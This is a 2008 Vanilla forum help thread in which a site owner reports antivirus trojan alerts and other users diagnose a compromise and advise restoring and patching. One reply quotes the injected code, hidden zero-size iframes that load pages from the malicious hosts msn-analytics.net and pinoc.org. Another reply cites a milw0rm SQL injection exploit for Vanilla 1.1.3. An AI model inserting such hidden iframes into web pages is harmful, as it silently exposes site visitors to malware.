Blog Documentation Try Vanilla Cloud
Vanilla 1 is no longer supported or maintained. If you need a copy, you can get it here.
HackerOne users: Testing against this community violates our program's Terms of Service and will result in your bounty being denied.
Options

Trojan Hack?

HortonHorton New
edited September 2008 in Vanilla 1.0 Help
The facts: I am using Vanilla 1.1.3 hosted via GoDaddy. I have not made any edits to any settings in at least a few weeks if not months. Today my users started complaining that they were getting Trojan messages from their anti-virus software. I saw it also but did not write down the name before the pop up went away. JS…. Something. (I know that does not help.) Another note the may mean nothing…. When I looked at my site I saw that the Vanilla PHP file and the two HTML files in the vanilla root showed that they have last change dates of a few days ago. I did not do that…. Using: Attachments 2.1 Google Analytics 1.2 JQMedia 0.6.3 ModTools 0.06.10b Nuggets 1.1.3 Poll 1.3 Tinymce 1.4.1 See for yourself if that is a good idea..... http://ballofspray.com/vanillaforum/

Comments

  • Options
    DinoboffDinoboff
    cleanup your server and report it to your provider. He might be able to help you find out how it happened.
    Look at your logs you might find weird requests.
  • Options
    TomTesterTomTester New
    edited September 2008
    WARNING TO OTHERS: DO NOT ACCESS HORTON'S SITE UNLESS YOU RUN A SANDBOXED BROWSER Horton, Checked out your site. It's indeed hacked. Every page has lines of code inserted at the bottom, leading to dangerous sites (edit: spaces added to disable auto-linking): <iframe src="http:// msn-analytics. net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http:// pinoc. org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe> My NOD/ESET blocks msn-analytics.net for trojan attacks. http://safeweb.norton.com/report/show?name=msn-analytics.net http://safeweb.norton.com/report/show?name=pinoc.org I see this article outlining how it was done and help fixing it (may require editing of path in perl script, look at source): http://blog.floogy.com/2008/08/fix-pinocorg-and-pinocinfo.html Contacting your ISP is still your best bet, because it seems the vulnerability may be related to setup of the server (TMP dir). Hope this helps. TT
  • Options
    HortonHorton New
    I am clearing out everything and restoring back a week. Makes me so mad.
  • Options
    HortonHorton New
    So I am going to reset my passwords as soon as the site is restored. Any other ideas? Am I right that a bot broke my FTP password and wrote to my server at GoDaddy?
  • Options
    HortonHorton New
    I have now reset the whole freak'n site back a week and changed my FTP passwords to be a strong as I can figure (Uppercase, Lower Case, Numbers and symbols - 14 digits). Is there anything else I need to do to keep this from happening again?
  • Options
    WallPhoneWallPhone
    Check version numbers of everything installed on the server, most popular software first and if there is something newer update it.

    Vanilla will come out with 1.1.5 shortly, so you can save that for last.
  • Options
    TomTesterTomTester New
    I don't think that FTP is the culprit. That's too cumbersome and easy to detect (by the ISP). Vanilla 1.1.3 is/was temporarily insecure, see: http://www.milw0rm.org/exploits/4548 Install the latest version of vanilla. Note: the pinoc issue occured most on servers with an older Joomla install. If you have that installed (even if you're not using it) just remove it. If you use other popular open source tools, check them on http://www.milw0rm.org/search.php (note: hacker site) or www.secunia.com (note: non-hacker site) to see if they have vulnerabilities or need updates. TT
  • Options
    DinoboffDinoboff
    edited September 2008
    As far as I know the only security issue in vanilla core that would have allowed injection in html or php files was in Vanilla 1 (it did require register_globals being on).
  • Options
    TomTesterTomTester New
    milworm script says:

    ## Vanilla <= 1.1.3 Remote Blind SQL Injection Exploit
    ## By InATeam (http://inattack.ru/)
    ## Requirements: MySQL >= 4.1, magic_quotes_gpc=Off
    ## Tested on versions 1.1.3, 1.1.2, 1.0.1
  • Options
    DinoboffDinoboff
    edited September 2008
    I know the vulnerability in 1.1.3 is severe but I don't think it would allowed to inject code in the files.
  • Options
    TomTesterTomTester New
    Sorry Dino, I did not read your previous reply properly. I agree that Vanilla 1.1.3 probably isn't the
    'attack vector' used to make changes on the server. Suspect Horton has other software installed
    which isn't fully patched. Being that the trojan was Pinoc, Joomla is the most likely origin.
  • Options
    HortonHorton New
    OK so if Vanilla and FTP passwords are not the issue?!? I have a wordpress install that I do not use and a couple of Coppermine installs. Not anything else that I can think of. What ever the path to corruption is my home page literally had code added to it. I would roll forward to the latest Vanilla but since I am not a PHP programmer if something breaks I am screwed.
This discussion has been closed.